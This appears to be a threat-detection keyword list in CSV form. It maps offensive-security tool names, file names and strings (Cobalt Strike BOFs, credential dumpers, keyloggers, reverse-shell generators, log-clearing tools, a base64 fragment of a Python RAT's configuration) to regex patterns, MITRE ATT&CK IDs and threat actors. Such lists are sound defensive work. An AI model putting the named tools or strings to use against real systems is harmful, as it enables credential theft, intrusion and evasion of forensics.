"*chromiumkeydump *",".{0,1000}chromiumkeydump\s.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38260"
"*chromiumkeydump*",".{0,1000}chromiumkeydump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38261"
"*ChromiumKeyDump.cna*",".{0,1000}ChromiumKeyDump\.cna.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38262"
"*ChromiumKeyDump.cpp*",".{0,1000}ChromiumKeyDump\.cpp.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38263"
"*ChromiumKeyDump.exe*",".{0,1000}ChromiumKeyDump\.exe.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1555.003 - T1081 - T1056.004 - T1003","TA0006 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","N/A","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","38264"
"*Chudry/Xerror*",".{0,1000}Chudry\/Xerror.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Chudry/Xerror","1","1","N/A","N/A","N/A","6","509","110","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z","38266"
"*chunk-Proxy.jar*",".{0,1000}chunk\-Proxy\.jar.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","38267"
"*chunlie.exe*",".{0,1000}chunlie\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38268"
"*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*",".{0,1000}cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","38269"
"*chvancooten/nimbuild*",".{0,1000}chvancooten\/nimbuild.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38270"
"*chvancooten/NimPlant*",".{0,1000}chvancooten\/NimPlant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38271"
"*chvancooten/OSEP-Code-Snippets*",".{0,1000}chvancooten\/OSEP\-Code\-Snippets.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","38272"
"*CICADA8 Research Team*",".{0,1000}CICADA8\sResearch\sTeam.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","38273"
"*CICADA8-Research/IHxExec*",".{0,1000}CICADA8\-Research\/IHxExec.{0,1000}","offensive_tool_keyword","IHxExec","Process injection technique","T1055.001 - T1055","TA0005 - TA0004 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CICADA8-Research/IHxExec","1","1","N/A","N/A","8","4","325","46","2024-09-06T07:58:41Z","2024-07-11T09:18:42Z","38274"
"*CICADA8-Research/RemoteKrbRelay*",".{0,1000}CICADA8\-Research\/RemoteKrbRelay.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","38275"
"*CICADA8-Research/Spyndicapped*",".{0,1000}CICADA8\-Research\/Spyndicapped.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","1","N/A","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","38276"
"*cilbuP\\sresU\\:C*",".{0,1000}cilbuP\\\\sresU\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38277"
"*cilbuP\sresU\:C*",".{0,1000}cilbuP\\sresU\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38278"
"*CIMplant.exe *",".{0,1000}CIMplant\.exe\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","38279"
"*CIMplant.sln*",".{0,1000}CIMplant\.sln.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","38280"
"*CIMplant-main*",".{0,1000}CIMplant\-main.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","38281"
"*Cipher7/ChaiLdr*",".{0,1000}Cipher7\/ChaiLdr.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","1","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","38282"
"*cirt-default-usernames.txt*",".{0,1000}cirt\-default\-usernames\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38283"
"*cirt-fuzzer*",".{0,1000}cirt\-fuzzer.{0,1000}","offensive_tool_keyword","cirt-fuzzer","A simple TCP/UDP protocol fuzzer.","T1046 - T1065 - T1190 - T1219 - T1221 - T1497","TA0001 - TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.ecrimelabs.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38284"
"*cisco2john.pl*",".{0,1000}cisco2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","38285"
"*CiscoCXSecurity/creddump7*",".{0,1000}CiscoCXSecurity\/creddump7.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","38286"
"*CiscoCXSecurity/linikatz*",".{0,1000}CiscoCXSecurity\/linikatz.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","38287"
"*cisco-phone-query.sh*",".{0,1000}cisco\-phone\-query\.sh.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","38288"
"*citronneur/pamspy*",".{0,1000}citronneur\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","38289"
"*citronneur/pamspy/releases*",".{0,1000}citronneur\/pamspy\/releases.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","38290"
"*cjelfplplebdjjenllpjcblmjkfcffne*",".{0,1000}cjelfplplebdjjenllpjcblmjkfcffne.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38291"
"*cjm00n/EvilSln*",".{0,1000}cjm00n\/EvilSln.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","N/A","10","","N/A","","","","38292"
"*Ck5PX0lQX0hPU1QgPSAnZ29vZ2xlY2hyb21lYXV0by5zZXJ2ZWlyYy5jb20nCkxIT1NUID0gJzE5Mi4xNjguMS4zJwpMUE9SVCA9IDQ0MwpUSU1FX1NMRUVQID0gMTAKClRFTVBfUEFUSCA9IHRlbXBmaWxlLmdldHRlbXBkaXIoKQpSRUdfUEFUSCA9IHIiU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIgpSRUdfTkFNRSA9ICJHb29nbGVDaHJvbWVBdXRvTGF1bmNoXzk5MjEzNjYxMDJXRUFEMjEzMTJFU0FEMzEzMTIiClJFR19WQUxVRSA*",".{0,1000}Ck5PX0lQX0hPU1QgPSAnZ29vZ2xlY2hyb21lYXV0by5zZXJ2ZWlyYy5jb20nCkxIT1NUID0gJzE5Mi4xNjguMS4zJwpMUE9SVCA9IDQ0MwpUSU1FX1NMRUVQID0gMTAKClRFTVBfUEFUSCA9IHRlbXBmaWxlLmdldHRlbXBkaXIoKQpSRUdfUEFUSCA9IHIiU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIgpSRUdfTkFNRSA9ICJHb29nbGVDaHJvbWVBdXRvTGF1bmNoXzk5MjEzNjYxMDJXRUFEMjEzMTJFU0FEMzEzMTIiClJFR19WQUxVRSA.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","38293"
"*cki3klxqycazagx3r5prae3nmfvxmwa34beknr3il4uf76vxd76akqid.onion*",".{0,1000}cki3klxqycazagx3r5prae3nmfvxmwa34beknr3il4uf76vxd76akqid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38294"
"*class MetasploitModule*",".{0,1000}class\sMetasploitModule.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38296"
"*class Plugin::Nemesis < Msf::Plugin*",".{0,1000}class\sPlugin\:\:Nemesis\s\<\sMsf\:\:Plugin.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","38297"
"*class ReverseBash*",".{0,1000}class\sReverseBash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","38298"
"*class T2WRPCServer(*",".{0,1000}class\sT2WRPCServer\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","38299"
"*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*",".{0,1000}Cleanup\-57BFF48E\-24FB\-48E9\-A390\-AC62ADF38B07\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","38300"
"*clear; history -c*",".{0,1000}clear\;\shistory\s\-c.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","38301"
"*clear_command_history.py*",".{0,1000}clear_command_history\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","38302"
"*clear_me_from_history()?*",".{0,1000}clear_me_from_history\(\)\?.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","38303"
"*ClearEventlog.vbs*",".{0,1000}ClearEventlog\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","38305"
"*ClearEventlog.vbs*",".{0,1000}ClearEventlog\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","38306"
"*Clearing Defender Quarantine Files*",".{0,1000}Clearing\sDefender\sQuarantine\sFiles.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","38307"
"*Clearing Shim Cache Data...*",".{0,1000}Clearing\sShim\sCache\sData\.\.\..{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","38308"
"*Clear-KeyCredentials -target *",".{0,1000}Clear\-KeyCredentials\s\-target\s.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","38309"
"*ClearnEventRecordID {*",".{0,1000}ClearnEventRecordID\s\{.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","38311"
"*ClearnEventRecordID.ps1*",".{0,1000}ClearnEventRecordID\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","38312"
"*ClearnIpAddress.ps1*",".{0,1000}ClearnIpAddress\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","38313"
"*clem9669/hashcat-rule*",".{0,1000}clem9669\/hashcat\-rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38315"
"*clem9669_case.rule*",".{0,1000}clem9669_case\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38316"
"*clem9669_large.rule*",".{0,1000}clem9669_large\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38317"
"*clem9669_medium.rule*",".{0,1000}clem9669_medium\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38318"
"*clem9669_small.rule*",".{0,1000}clem9669_small\.rule.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","#linux","N/A","10","5","435","47","2024-09-02T20:14:15Z","2020-03-06T17:20:40Z","38319"
